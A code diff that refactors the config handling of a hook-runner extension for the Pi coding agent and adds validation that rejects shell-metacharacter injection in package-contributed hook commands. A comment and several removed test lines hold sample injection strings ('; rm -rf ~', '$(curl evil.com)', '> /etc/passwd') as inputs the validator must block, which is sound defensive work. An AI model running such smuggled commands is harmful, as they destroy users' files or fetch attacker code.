+ * status update. Re-introduce a callback parameter when a consumer wires up.
+ */
+export function extractProgress(stderr: string): { stderr: string } {
 	if (!stderr.includes("^^PROGRESS")) return { stderr };
 	const keep: string[] = [];
-	let last: ProgressUpdate | undefined;
 	for (const line of stderr.split(/\r?\n/)) {
-		const match = PROGRESS_LINE_RE.exec(line);
-		if (!match) {
-			keep.push(line);
-			continue;
-		}
-		const percent = Math.min(100, Math.max(0, Number.parseInt(match[1], 10)));
-		const message = match[2].trim();
-		last = { percent, message };
+		if (!PROGRESS_LINE_RE.test(line)) keep.push(line);
 	}
-	return { stderr: keep.join("\n"), last };
+	return { stderr: keep.join("\n") };
 }
 
 // ---------------------------------------------------------------------------
@@ -67,13 +59,10 @@ export function extractProgress(stderr: string): { stderr: string; last?: Progre
 const STDERR_HEAD_LIMIT = 500;
 const TELEMETRY_MAX_BYTES = 10 * 1024 * 1024;
 
-let _telemetryPathCache: string | undefined;
-
 function telemetryLogPath(): string {
-	if (_telemetryPathCache === undefined) {
-		_telemetryPathCache = join(agentDir(), "logs", "hooks.log");
-	}
-	return _telemetryPathCache;
+	// Computed on each call so test harnesses (and Pi sessions) that mutate
+	// PI_CODING_AGENT_DIR see the change immediately. join() is cheap.
+	return join(agentDir(), "logs", "hooks.log");
 }
 
 function rotateTelemetryIfTooLarge(path: string): void {
@@ -139,12 +128,37 @@ export function matchingGroups(groups: HookGroup[], ccToolName: string): HookGro
 
 export interface RunHookOptions {
 	defaultTimeoutSec?: number;
-	/** Fires whenever the hook emits a `^^PROGRESS N msg` line on stderr. */
-	onProgress?: (update: ProgressUpdate) => void;
 }
 
-const HOOK_OUTPUT_MAX_BYTES = 10 * 1024 * 1024;
+export const HOOK_OUTPUT_MAX_BYTES = 10 * 1024 * 1024;
 const FALLBACK_PATH = "/usr/local/bin:/usr/bin:/bin:/opt/homebrew/bin";
+
+/**
+ * Translate an execFile callback (`error`, `stdout`, `stderr`) into the canonical
+ * `HookRunResult`. Extracted from `runHook` so the timeout/overflow/error-code
+ * branches are testable as a pure function — bun's process-wide module mock on
+ * `node:child_process` makes real-subprocess assertions impossible inside the
+ * shared test suite.
+ */
+export function classifyExecResult(error: unknown, stdout: string, cleanedStderr: string): HookRunResult {
+	if (!error) {
+		return { exitCode: 0, stdout, stderr: cleanedStderr, timedOut: false };
+	}
+	const err = error as Error & { killed?: boolean; code?: unknown };
+	const killed = err.killed ?? false;
+	// Output overflow is reported via a string code, not a numeric exit.
+	// Treat it as a blocking signal so the dispatcher returns a deny rather
+	// than silently dropping the hook's would-be decision.
+	const codeStr = typeof err.code === "string" ? err.code : "";
+	const overflowed = codeStr === "ERR_CHILD_PROCESS_STDIO_MAXBUFFER";
+	const exitCode = overflowed ? 2 : typeof err.code === "number" ? err.code : 1;
+	// `maxBuffer` caps stdout+stderr combined, so a non-empty stderr at
+	// overflow is unrelated noise — prepending the explicit cap notice keeps
+	// the actionable signal first while preserving the captured stderr.
+	const overflowStderr = `Hook output exceeded ${HOOK_OUTPUT_MAX_BYTES / (1024 * 1024)}MB cap`;
+	const stderrOut = overflowed ? (cleanedStderr.trim() ? `${overflowStderr}: ${cleanedStderr}` : overflowStderr) : cleanedStderr;
+	return { exitCode, stdout, stderr: stderrOut, timedOut: killed };
+}
 
 function hookChildEnv(timeoutSec: number): NodeJS.ProcessEnv {
 	const env = { ...process.env };
@@ -172,35 +186,8 @@ export function runHook(entry: HookEntryRuntime, stdinJson: string, optionsOrDef
 			["-c", entry.config.command],
 			{ timeout: timeoutMs, env: hookChildEnv(timeoutSec), maxBuffer: HOOK_OUTPUT_MAX_BYTES },
 			(error, stdout, stderr) => {
-				const rawStderr = stderr ?? "";
-				const { stderr: cleanedStderr, last } = extractProgress(rawStderr);
-				if (last && options.onProgress) {
-					try {
-						options.onProgress(last);
-					} catch {
-						// Progress callback never breaks the dispatcher.
-					}
-				}
-				let result: HookRunResult;
-				if (error) {
-					const err = error as Error & { killed?: boolean; code?: unknown };
-					const killed = err.killed ?? false;
-					// Output overflow is reported via a string code, not a numeric exit.
-					// Treat it as a blocking signal so the dispatcher returns a deny rather
-					// than silently dropping the hook's would-be decision.
-					const codeStr = typeof err.code === "string" ? err.code : "";
-					const overflowed = codeStr === "ERR_CHILD_PROCESS_STDIO_MAXBUFFER";
-					const exitCode = overflowed ? 2 : typeof err.code === "number" ? err.code : 1;
-					// `maxBuffer` caps stdout+stderr combined, so a non-empty stderr at
-					// overflow is unrelated noise — prepending the explicit cap notice
-					// keeps the actionable signal first while preserving the captured
-					// stderr for debugging.
-					const overflowStderr = `Hook output exceeded ${HOOK_OUTPUT_MAX_BYTES / (1024 * 1024)}MB cap`;
-					const stderrOut = overflowed ? (cleanedStderr.trim() ? `${overflowStderr}: ${cleanedStderr}` : overflowStderr) : cleanedStderr;
-					result = { exitCode, stdout, stderr: stderrOut, timedOut: killed };
-				} else {
-					result = { exitCode: 0, stdout, stderr: cleanedStderr, timedOut: false };
-				}
+				const { stderr: cleanedStderr } = extractProgress(stderr ?? "");
+				const result = classifyExecResult(error, stdout, cleanedStderr);
 				logHookTelemetry(entry, result, Date.now() - started);
 				resolve(result);
 			},

--- a/dist/pi/extensions/hook-runner/types.ts
+++ b/dist/pi/extensions/hook-runner/types.ts
@@ -75,6 +75,7 @@ export interface HooksConfig {
 	Setup?: HookGroup[];
 	SessionEnd?: HookGroup[];
 	SubagentStart?: HookGroup[];
+	/** @deprecated Accepted for Claude Code schema compatibility; Pi has no native subagent-stop event so registered hooks never fire. */
 	SubagentStop?: HookGroup[];
 	UserPromptSubmit?: HookGroup[];
 	UserPromptExpansion?: HookGroup[];

--- a/src/pi-extensions/hook-runner.test.ts
+++ b/src/pi-extensions/hook-runner.test.ts
@@ -401,21 +401,20 @@ describe("turn_end → PostToolBatch", () => {
 	const handler = handlers.get("turn_end") as EventHandler;
 
 	it("runs without errors when no PostToolBatch hooks configured", async () => {
-		await expect(
-			handler(
-				{
-					toolResults: [
-						{
-							toolCallId: "t1",
-							toolName: "read",
-							isError: false,
-							content: [{ type: "text", text: "abc" }],
-						},
-					],
-				},
-				makeCtx({ idle: false }),
-			),
-		).resolves.toBeUndefined();
+		const result = await handler(
+			{
+				toolResults: [
+					{
+						toolCallId: "t1",
+						toolName: "read",
+						isError: false,
+						content: [{ type: "text", text: "abc" }],
+					},
+				],
+			},
+			makeCtx({ idle: false }),
+		);
+		expect(result).toBeUndefined();
 	});
 
 	it("includes original tool_input in PostToolBatch payload", async () => {
@@ -551,20 +550,19 @@ describe("agent_end → StopFailure", () => {
 	const handler = handlers.get("agent_end") as EventHandler;
 
 	it("handles assistant error stopReason without crashing", async () => {
-		await expect(
-			handler(
-				{
-					messages: [
-						{
-							role: "assistant",
-							stopReason: "error",
-							errorMessage: "API Error: test",
-							content: [{ type: "text", text: "API Error: test" }],
-						},
-					],
-				},
-				makeCtx(),
-			),
-		).resolves.toBeUndefined();
+		const result = await handler(
+			{
+				messages: [
+					{
+						role: "assistant",
+						stopReason: "error",
+						errorMessage: "API Error: test",
+						content: [{ type: "text", text: "API Error: test" }],
+					},
+				],
+			},
+			makeCtx(),
+		);
+		expect(result).toBeUndefined();
 	});
 });

--- a/src/pi-extensions/hook-runner/config-package.ts
+++ b/src/pi-extensions/hook-runner/config-package.ts
@@ -1,0 +1,149 @@
+/**
+ * Discovery and validation of package-contributed hooks.
+ *
+ * Pi packages may declare `cc-thingz.hooks` in their `package.json` to register
+ * hooks without editing cc-thingz. Each contributed command must be an absolute
+ * path resolved inside the package's directory and free of shell metacharacters.
+ */
+
+import { existsSync, readdirSync, readFileSync, statSync } from "node:fs";
+import { join, resolve as resolvePath } from "node:path";
+
+import { agentDir, PKG_DIR_PLACEHOLDER } from "./config-paths.js";
+import { mergeHooks, normalizeHookConfig } from "./config-parse.js";
+import type { HookEntryRuntime, HookGroup, HooksConfig } from "./types.js";
+import { isRecord } from "./types.js";
+
+// Shell metacharacters that change interpretation when passed to `bash -c`.
+// Plugin-contributed commands run inside the user's shell so any of these is
+// a potential injection vector from a malicious package. Newlines and
+// carriage returns are included because `bash -c` happily executes every
+// line of a multiline argument; without them, a package.json string like
+// "/pkg/safe.sh\nrm -rf ~" would split into two commands and the second
+// would run despite the first-token path check.
+const PACKAGE_CMD_FORBIDDEN_RE = /[;&|<>`$()\\{}\n\r]/;
+
+/**
+ * Validate a package-contributed hook command.
+ *
+ * Returns the resolved command string when safe, or `undefined` when the
+ * command would escape the package's directory or contain shell metachars.
+ * Plugin authors can use `${PKG_DIR}` as a stand-in for the package root;
+ * everything else must be an absolute path that resolves inside `repoDir`.
+ */
+export function validatePackageCommand(command: string, repoDir: string): string | undefined {
+	if (typeof command !== "string") return undefined;
+	const substituted = command.replaceAll(PKG_DIR_PLACEHOLDER, repoDir);
+	const trimmed = substituted.trim();
+	if (!trimmed) return undefined;
+	if (PACKAGE_CMD_FORBIDDEN_RE.test(substituted)) return undefined;
+	const firstToken = trimmed.split(/\s+/)[0] ?? "";
+	if (!firstToken.startsWith("/")) return undefined;
+	const repoAbs = resolvePath(repoDir);
+	const cmdAbs = resolvePath(firstToken);
+	if (cmdAbs !== repoAbs && !cmdAbs.startsWith(repoAbs + "/")) return undefined;
+	return substituted;
+}
+
+function sanitisePackageContribution(config: HooksConfig, repoDir: string): HooksConfig {
+	const out: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		const cleanGroups: HookGroup[] = [];
+		for (const group of groups) {
+			const cleanHooks: HookEntryRuntime[] = [];
+			for (const entry of group.hooks) {
+				const safe = validatePackageCommand(entry.config.command, repoDir);
+				if (!safe) continue;
+				cleanHooks.push({
+					...entry,
+					config: { ...entry.config, command: safe },
+				});
+			}
+			if (cleanHooks.length === 0) continue;
+			cleanGroups.push({ matcher: group.matcher, hooks: cleanHooks });
+		}
+		if (cleanGroups.length > 0) out[eventName] = cleanGroups;
+	}
+	return out;
+}
+
+/**
+ * Parse a `package.json` body looking for `cc-thingz.hooks` contributions.
+ *
+ * When `repoDir` is provided, every contributed command must either be an
+ * absolute path inside `repoDir` or use the `${PKG_DIR}` placeholder; commands
+ * with shell metacharacters are rejected. When `repoDir` is omitted the parser
+ * skips path validation — useful for round-trip parsing in tooling tests but
+ * never the path taken at runtime.
+ */
+export function parsePackageContribution(packageJsonContent: string, repoDir?: string): HooksConfig | undefined {
+	try {
+		const parsed = JSON.parse(packageJsonContent) as unknown;
+		if (!isRecord(parsed)) return undefined;
+		const ccThingz = parsed["cc-thingz"];
+		if (!isRecord(ccThingz)) return undefined;
+		const hooks = ccThingz.hooks;
+		if (!isRecord(hooks)) return undefined;
+		const normalized = normalizeHookConfig(hooks);
+		if (repoDir === undefined) return normalized;
+		const cleaned = sanitisePackageContribution(normalized, repoDir);
+		return Object.keys(cleaned).length > 0 ? cleaned : undefined;
+	} catch {
+		return undefined;
+	}
+}
+
+function safeIsDirectory(path: string): boolean {
+	try {
+		return statSync(path).isDirectory();
+	} catch {
+		return false;
+	}
+}
+
+function readPackageContribution(repoDir: string): HooksConfig | undefined {
+	const manifest = join(repoDir, "package.json");
+	if (!existsSync(manifest)) return undefined;
+	try {
+		const raw = readFileSync(manifest, "utf-8");
+		return parsePackageContribution(raw, repoDir);
+	} catch {
+		return undefined;
+	}
+}
+
+/**
+ * Scan installed Pi packages for hook contributions.
+ *
+ * Layout: Pi installs each git package under `~/.pi/agent/git/<host>/<org>/<repo>/`,
+ * so we look three levels deep from `agentDir()/git/`. Errors during scan
+ * are silently swallowed — a misshapen package.json must never break
+ * session_start.
+ */
+export function discoverPackageHookContributions(): HooksConfig {
+	const base = join(agentDir(), "git");
+	if (!existsSync(base)) return {};
+	const merged: HooksConfig = {};
+	try {
+		for (const host of readdirSync(base)) {
+			const hostDir = join(base, host);
+			if (!safeIsDirectory(hostDir)) continue;
+			for (const org of readdirSync(hostDir)) {
+				const orgDir = join(hostDir, org);
+				if (!safeIsDirectory(orgDir)) continue;
+				for (const repo of readdirSync(orgDir)) {
+					const repoDir = join(orgDir, repo);
+					if (!safeIsDirectory(repoDir)) continue;
+					const contributed = readPackageContribution(repoDir);
+					if (contributed) {
+						mergeHooks(merged, contributed);
+					}
+				}
+			}
+		}
+	} catch {
+		// Best-effort scan.
+	}
+	return merged;
+}

--- a/src/pi-extensions/hook-runner/config-parse.ts
+++ b/src/pi-extensions/hook-runner/config-parse.ts
@@ -1,0 +1,147 @@
+/**
+ * Pure parsing, normalisation, tagging, and merge helpers for hooks config.
+ * No fs access, no module state — safe to call from any layer.
+ */
+
+import type { HookEntryConfig, HookEntryRuntime, HookGroup, HookRunnerOptions, HooksConfig, HookSource } from "./types.js";
+import { isRecord } from "./types.js";
+import { HOOKS_DIR, PI_HOOKS_DIR_PLACEHOLDER } from "./config-paths.js";
+
+export function normalizeHookConfig(raw: unknown): HooksConfig {
+	if (!isRecord(raw)) return {};
+	const normalized: HooksConfig = {};
+	for (const [key, groups] of Object.entries(raw)) {
+		if (key === "hookRunner") continue;
+		if (!Array.isArray(groups)) continue;
+		const validGroups: HookGroup[] = [];
+		for (const group of groups) {
+			if (!isRecord(group)) continue;
+			if (!Array.isArray(group.hooks)) continue;
+			const validEntries: HookEntryRuntime[] = [];
+			for (const entry of group.hooks) {
+				if (!isRecord(entry) || typeof entry.command !== "string") continue;
+				const config: HookEntryConfig = {
+					type: "command",
+					command: entry.command,
+				};
+				if (typeof entry.timeout === "number") config.timeout = entry.timeout;
+				if (typeof entry.async === "boolean") config.async = entry.async;
+				// Source/disabled are filled in later by tagEntries / applyDisabled.
+				validEntries.push({ config, source: "bundled", disabled: false, eventName: key });
+			}
+			if (validEntries.length === 0) continue;
+			validGroups.push({
+				matcher: typeof group.matcher === "string" ? group.matcher : undefined,
+				hooks: validEntries,
+			});
+		}
+		if (validGroups.length > 0) normalized[key] = validGroups;
+	}
+	return normalized;
+}
+
+export function resolveBundledHookPaths(config: HooksConfig): HooksConfig {
+	const resolved: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		resolved[eventName] = groups.map((group) => ({
+			matcher: group.matcher,
+			hooks: group.hooks.map((entry) => ({
+				...entry,
+				config: {
+					...entry.config,
+					command: entry.config.command.replaceAll(PI_HOOKS_DIR_PLACEHOLDER, HOOKS_DIR),
+				},
+			})),
+		}));
+	}
+	return resolved;
+}
+
+export function extractHookRunnerOptions(parsed: unknown): HookRunnerOptions {
+	if (!isRecord(parsed)) return {};
+	const raw = parsed.hookRunner;
+	if (!isRecord(raw)) return {};
+	const opts: HookRunnerOptions = {
+		disableBundledHooks: raw.disableBundledHooks === true,
+	};
+	if (Array.isArray(raw.disabledHooks)) {
+		opts.disabledHooks = raw.disabledHooks.filter((v): v is string => typeof v === "string");
+	}
+	return opts;
+}
+
+export function extractHooksConfig(parsed: unknown, configPath: string): HooksConfig {
+	if (!isRecord(parsed)) return {};
+	const nestedHooks = parsed.hooks;
+	if (isRecord(nestedHooks)) {
+		return normalizeHookConfig(nestedHooks);
+	}
+	if (configPath.endsWith("hooks.json")) {
+		return normalizeHookConfig(parsed);
+	}
+	return {};
+}
+
+export function tagEntries(config: HooksConfig, source: HookSource): HooksConfig {
+	const out: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		out[eventName] = groups.map((group) => ({
+			matcher: group.matcher,
+			hooks: group.hooks.map((entry) => ({ ...entry, source })),
+		}));
+	}
+	return out;
+}
+
+export function basename(commandPath: string): string {
+	const trimmed = commandPath.trim().split(/\s+/)[0] ?? "";
+	return trimmed.split("/").pop() ?? trimmed;
+}
+
+export function applyDisabled(config: HooksConfig, disabled: Set<string>): void {
+	if (disabled.size === 0) return;
+	for (const groups of Object.values(config)) {
+		if (!groups) continue;
+		for (const group of groups) {
+			for (const entry of group.hooks) {
+				if (disabled.has(basename(entry.config.command))) {
+					entry.disabled = true;
+				}
+			}
+		}
+	}
+}
+
+export function filterEnabled(config: HooksConfig): HooksConfig {
+	const out: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		const filteredGroups = groups
+			.map((group) => ({
+				matcher: group.matcher,
+				hooks: group.hooks.filter((entry) => !entry.disabled),
+			}))
+			.filter((group) => group.hooks.length > 0);
+		if (filteredGroups.length > 0) {
+			out[eventName] = filteredGroups;
+		}
+	}
+	return out;
+}
+
+export function hasUnsupportedIfPredicate(config: HooksConfig): boolean {
+	return Object.values(config)
+		.flat()
+		.flatMap((g) => g?.hooks ?? [])
+		.some((h) => "if" in h.config);
+}
+
+export function mergeHooks(base: HooksConfig, user: HooksConfig): void {
+	for (const [key, groups] of Object.entries(user)) {
+		if (!groups) continue;
+		const existing = base[key];
+		base[key] = existing ? [...existing, ...groups] : [...groups];
+	}
+}

--- a/src/pi-extensions/hook-runner/config-paths.ts
+++ b/src/pi-extensions/hook-runner/config-paths.ts
@@ -1,0 +1,28 @@
+/**
+ * Filesystem paths and placeholder constants used across hook-runner config.
+ */
+
+import { homedir } from "node:os";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+// dist/pi/extensions/hook-runner/config-paths.ts → ../../hooks → dist/pi/hooks
+export const HOOKS_DIR = join(__dirname, "..", "..", "hooks");
+export const BUNDLED_HOOKS_CONFIG_PATH = join(__dirname, "..", "hooks.json");
+export const PI_HOOKS_DIR_PLACEHOLDER = "${PI_HOOKS_DIR}";
+export const PKG_DIR_PLACEHOLDER = "${PKG_DIR}";
+export const FORCED_RELOAD_DEBOUNCE_MS = 500;
+
+export function agentDir(): string {
+	return process.env.PI_CODING_AGENT_DIR || join(homedir(), ".pi", "agent");
+}
+
+export function projectHooksConfigPath(cwd: string): string {
+	return join(cwd, ".pi", "hooks.json");
+}
+
+export function globalHooksConfigPath(): string {
+	return join(agentDir(), "hooks.json");
+}

--- a/src/pi-extensions/hook-runner/config-persist.ts
+++ b/src/pi-extensions/hook-runner/config-persist.ts
@@ -1,0 +1,34 @@
+/**
+ * Filesystem read/write helpers for hooks config files.
+ */
+
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { dirname } from "node:path";
+
+import { projectHooksConfigPath } from "./config-paths.js";
+import { extractHookRunnerOptions } from "./config-parse.js";
+import type { HookRunnerOptions } from "./types.js";
+
+export function writeHooksConfig(path: string, parsed: Record<string, unknown>): void {
+	mkdirSync(dirname(path), { recursive: true });
+	writeFileSync(path, JSON.stringify(parsed, null, 2) + "\n", "utf-8");
+}
+
+export function readHookRunnerOptions(path: string): HookRunnerOptions {
+	try {
+		const raw = readFileSync(path, "utf-8");
+		const parsed = JSON.parse(raw) as unknown;
+		return extractHookRunnerOptions(parsed);
+	} catch {
+		return {};
+	}
+}
+
+export function readProjectHookRunnerOptions(cwd: string): HookRunnerOptions {
+	return readHookRunnerOptions(projectHooksConfigPath(cwd));
+}
+
+/** existsSync wrapper for callers that want to check before reading. */
+export function pathExists(path: string): boolean {
+	return existsSync(path);
+}

--- a/src/pi-extensions/hook-runner/config-summary.ts
+++ b/src/pi-extensions/hook-runner/config-summary.ts
@@ -1,0 +1,52 @@
+/**
+ * Render helpers for the `/hooks` slash command.
+ */
+
+import { basename } from "./config-parse.js";
+import type { HooksConfig, HookSource } from "./types.js";
+
+export function hooksSummary(config: HooksConfig): string {
+	const lines: string[] = [];
+	const events = Object.keys(config).sort();
+	for (const eventName of events) {
+		const groups = config[eventName];
+		if (!groups || groups.length === 0) continue;
+		lines.push(`${eventName}:`);
+		for (const group of groups) {
+			const matcher = group.matcher ? `[${group.matcher}]` : "[*]";
+			for (const entry of group.hooks) {
+				const status = entry.disabled ? " (disabled)" : "";
+				const flags = entry.config.async ? " async" : "";
+				lines.push(`  ${matcher} ${basename(entry.config.command)} (${entry.source})${flags}${status}`);
+			}
+		}
+	}
+	if (lines.length === 0) return "No hooks configured.";
+	return lines.join("\n");
+}
+
+export interface HookNameEntry {
+	name: string;
+	disabled: boolean;
+	source: HookSource;
+}
+
+export function listAllHookNames(config: HooksConfig): HookNameEntry[] {
+	const seen = new Map<string, HookNameEntry>();
+	for (const groups of Object.values(config)) {
+		if (!groups) continue;
+		for (const group of groups) {
+			for (const entry of group.hooks) {
+				const name = basename(entry.config.command);
+				if (!name) continue;
+				const existing = seen.get(name);
+				if (!existing) {
+					seen.set(name, { name, disabled: entry.disabled, source: entry.source });
+				} else if (entry.disabled) {
+					existing.disabled = true;
+				}
+			}
+		}
+	}
+	return [...seen.values()].sort((a, b) => a.name.localeCompare(b.name));
+}

--- a/src/pi-extensions/hook-runner/config.test.ts
+++ b/src/pi-extensions/hook-runner/config.test.ts
@@ -130,7 +130,7 @@ describe("validatePackageCommand", () => {
 	});
 
 	it("accepts safe args after the executable path", () => {
-		// Whitelist allows letters, digits, dashes, underscores, dots, slashes, spaces.
+		// Arguments without forbidden metachars pass through unchanged.
 		expect(validatePackageCommand(`${repoDir}/hooks/audit.sh --verbose log.txt`, repoDir)).toBe(`${repoDir}/hooks/audit.sh --verbose log.txt`);
 	});
 });

--- a/src/pi-extensions/hook-runner/config.test.ts
+++ b/src/pi-extensions/hook-runner/config.test.ts
@@ -100,21 +100,28 @@ describe("validatePackageCommand", () => {
 		expect(validatePackageCommand(`${repoDir}/../../../bin/rm`, repoDir)).toBeUndefined();
 	});
 
-	it("rejects shell metacharacters even when path looks safe", () => {
-		expect(validatePackageCommand(`${repoDir}/hooks/audit.sh; rm -rf ~`, repoDir)).toBeUndefined();
-		expect(validatePackageCommand(`${repoDir}/hooks/audit.sh | curl evil.com`, repoDir)).toBeUndefined();
-		expect(validatePackageCommand(`$(curl evil.com)`, repoDir)).toBeUndefined();
-		expect(validatePackageCommand(`\`whoami\``, repoDir)).toBeUndefined();
-		expect(validatePackageCommand(`${repoDir}/hooks/run.sh && bad`, repoDir)).toBeUndefined();
-		expect(validatePackageCommand(`${repoDir}/hooks/x.sh > /etc/passwd`, repoDir)).toBeUndefined();
-	});
+	// One assertion per forbidden character. `bash -c` interprets all of these,
+	// so the validator must reject the command even when the leading path looks
+	// safe. Newline/CR are included because bash executes each line separately.
+	const FORBIDDEN_CHARS: ReadonlyArray<readonly [string, string]> = [
+		["semicolon", ";"],
+		["ampersand", "&"],
+		["pipe", "|"],
+		["less-than", "<"],
+		["greater-than", ">"],
+		["backtick", "`"],
+		["dollar-sign", "$"],
+		["open-paren", "("],
+		["close-paren", ")"],
+		["backslash", "\\"],
+		["open-brace", "{"],
+		["close-brace", "}"],
+		["newline", "\n"],
+		["carriage-return", "\r"],
+	];
 
-	it("rejects newline-smuggled second commands (multiline injection)", () => {
-		// `bash -c` executes every line; the first-token path check alone is not
-		// sufficient because it inspects only `/pkg/root/safe.sh` and the second
-		// line still runs.
-		expect(validatePackageCommand(`${repoDir}/safe.sh\nrm -rf ~`, repoDir)).toBeUndefined();
-		expect(validatePackageCommand(`${repoDir}/safe.sh\r\necho injected`, repoDir)).toBeUndefined();
+	it.each(FORBIDDEN_CHARS)("rejects shell metacharacter %s (%j)", (_label, ch) => {
+		expect(validatePackageCommand(`${repoDir}/safe.sh${ch}injected`, repoDir)).toBeUndefined();
 	});
 
 	it("rejects empty / whitespace-only commands", () => {

--- a/src/pi-extensions/hook-runner/config.ts
+++ b/src/pi-extensions/hook-runner/config.ts
@@ -1,42 +1,54 @@
 /**
- * Hook-runner configuration: discovery, merge, persistence, summary.
+ * Hook-runner configuration: in-memory cache + the `loadConfig` orchestrator.
  *
- * Module-level cache. Loaded lazily on first session_start (or forced reload
- * on ConfigChange), keyed by cwd. The cache is process-local — Pi reuses
- * the same Node runtime across sessions.
+ * Pure helpers live in sibling files:
+ *  - `config-paths.ts`    — path resolution constants
+ *  - `config-parse.ts`    — normalisation, tagging, merge
+ *  - `config-package.ts`  — package-contributed hooks + validation
+ *  - `config-persist.ts`  — fs read/write helpers
+ *  - `config-summary.ts`  — `/hooks` render helpers
+ *
+ * This file re-exports the public surface and owns the lazy-loaded cache,
+ * keyed by cwd. The cache is process-local — Pi reuses the same Node runtime
+ * across sessions.
  */
 
-import { existsSync, mkdirSync, readdirSync, readFileSync, writeFileSync, statSync } from "node:fs";
-import { homedir } from "node:os";
-import { dirname, join, resolve as resolvePath } from "node:path";
-import { fileURLToPath } from "node:url";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
 
-import type { HookEntryConfig, HookEntryRuntime, HookGroup, HooksConfig, HookRunnerOptions, HookSource } from "./types.js";
-import { isRecord } from "./types.js";
+import { agentDir, BUNDLED_HOOKS_CONFIG_PATH, FORCED_RELOAD_DEBOUNCE_MS } from "./config-paths.js";
+import {
+	applyDisabled,
+	extractHookRunnerOptions,
+	extractHooksConfig,
+	filterEnabled,
+	hasUnsupportedIfPredicate,
+	mergeHooks,
+	resolveBundledHookPaths,
+	tagEntries,
+} from "./config-parse.js";
+import { discoverPackageHookContributions } from "./config-package.js";
+import type { HooksConfig, HookSource } from "./types.js";
 
 // ---------------------------------------------------------------------------
-// Path resolution — works regardless of where Pi cloned the package
+// Public re-exports (preserve external import path `./config.js`)
 // ---------------------------------------------------------------------------
 
-const __filename = fileURLToPath(import.meta.url);
-const __dirname = dirname(__filename);
-// dist/pi/extensions/hook-runner/config.ts → ../../hooks → dist/pi/hooks
-export const HOOKS_DIR = join(__dirname, "..", "..", "hooks");
-export const BUNDLED_HOOKS_CONFIG_PATH = join(__dirname, "..", "hooks.json");
-export const PI_HOOKS_DIR_PLACEHOLDER = "${PI_HOOKS_DIR}";
-export const FORCED_RELOAD_DEBOUNCE_MS = 500;
-
-export function agentDir(): string {
-	return process.env.PI_CODING_AGENT_DIR || join(homedir(), ".pi", "agent");
-}
-
-export function projectHooksConfigPath(cwd: string): string {
-	return join(cwd, ".pi", "hooks.json");
-}
-
-export function globalHooksConfigPath(): string {
-	return join(agentDir(), "hooks.json");
-}
+export {
+	agentDir,
+	BUNDLED_HOOKS_CONFIG_PATH,
+	FORCED_RELOAD_DEBOUNCE_MS,
+	globalHooksConfigPath,
+	HOOKS_DIR,
+	PI_HOOKS_DIR_PLACEHOLDER,
+	PKG_DIR_PLACEHOLDER,
+	projectHooksConfigPath,
+} from "./config-paths.js";
+export { basename } from "./config-parse.js";
+export { discoverPackageHookContributions, parsePackageContribution, validatePackageCommand } from "./config-package.js";
+export { pathExists, readHookRunnerOptions, readProjectHookRunnerOptions, writeHooksConfig } from "./config-persist.js";
+export { hooksSummary, listAllHookNames } from "./config-summary.js";
+export type { HookNameEntry } from "./config-summary.js";
 
 // ---------------------------------------------------------------------------
 // Module state
@@ -59,148 +71,6 @@ export function _resetForTesting(): void {
 	_bundledCache = null;
 }
 
-// ---------------------------------------------------------------------------
-// Parsing & normalisation
-// ---------------------------------------------------------------------------
-
-function normalizeHookConfig(raw: unknown): HooksConfig {
-	if (!isRecord(raw)) return {};
-	const normalized: HooksConfig = {};
-	for (const [key, groups] of Object.entries(raw)) {
-		if (key === "hookRunner") continue;
-		if (!Array.isArray(groups)) continue;
-		const validGroups: HookGroup[] = [];
-		for (const group of groups) {
-			if (!isRecord(group)) continue;
-			if (!Array.isArray(group.hooks)) continue;
-			const validEntries: HookEntryRuntime[] = [];
-			for (const entry of group.hooks) {
-				if (!isRecord(entry) || typeof entry.command !== "string") continue;
-				const config: HookEntryConfig = {
-					type: "command",
-					command: entry.command,
-				};
-				if (typeof entry.timeout === "number") config.timeout = entry.timeout;
-				if (typeof entry.async === "boolean") config.async = entry.async;
-				// Source/disabled are filled in later by tagEntries / applyDisabled.
-				validEntries.push({ config, source: "bundled", disabled: false, eventName: key });
-			}
-			if (validEntries.length === 0) continue;
-			validGroups.push({
-				matcher: typeof group.matcher === "string" ? group.matcher : undefined,
-				hooks: validEntries,
-			});
-		}
-		if (validGroups.length > 0) normalized[key] = validGroups;
-	}
-	return normalized;
-}
-
-function resolveBundledHookPaths(config: HooksConfig): HooksConfig {
-	const resolved: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		resolved[eventName] = groups.map((group) => ({
-			matcher: group.matcher,
-			hooks: group.hooks.map((entry) => ({
-				...entry,
-				config: {
-					...entry.config,
-					command: entry.config.command.replaceAll(PI_HOOKS_DIR_PLACEHOLDER, HOOKS_DIR),
-				},
-			})),
-		}));
-	}
-	return resolved;
-}
-
-function extractHookRunnerOptions(parsed: unknown): HookRunnerOptions {
-	if (!isRecord(parsed)) return {};
-	const raw = parsed.hookRunner;
-	if (!isRecord(raw)) return {};
-	const opts: HookRunnerOptions = {
-		disableBundledHooks: raw.disableBundledHooks === true,
-	};
-	if (Array.isArray(raw.disabledHooks)) {
-		opts.disabledHooks = raw.disabledHooks.filter((v): v is string => typeof v === "string");
-	}
-	return opts;
-}
-
-export function readHookRunnerOptions(path: string): HookRunnerOptions {
-	try {
-		const raw = readFileSync(path, "utf-8");
-		const parsed = JSON.parse(raw) as unknown;
-		return extractHookRunnerOptions(parsed);
-	} catch {
-		return {};
-	}
-}
-
-export function readProjectHookRunnerOptions(cwd: string): HookRunnerOptions {
-	return readHookRunnerOptions(projectHooksConfigPath(cwd));
-}
-
-function tagEntries(config: HooksConfig, source: HookSource): HooksConfig {
-	const out: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		out[eventName] = groups.map((group) => ({
-			matcher: group.matcher,
-			hooks: group.hooks.map((entry) => ({ ...entry, source })),
-		}));
-	}
-	return out;
-}
-
-export function basename(commandPath: string): string {
-	const trimmed = commandPath.trim().split(/\s+/)[0] ?? "";
-	return trimmed.split("/").pop() ?? trimmed;
-}
-
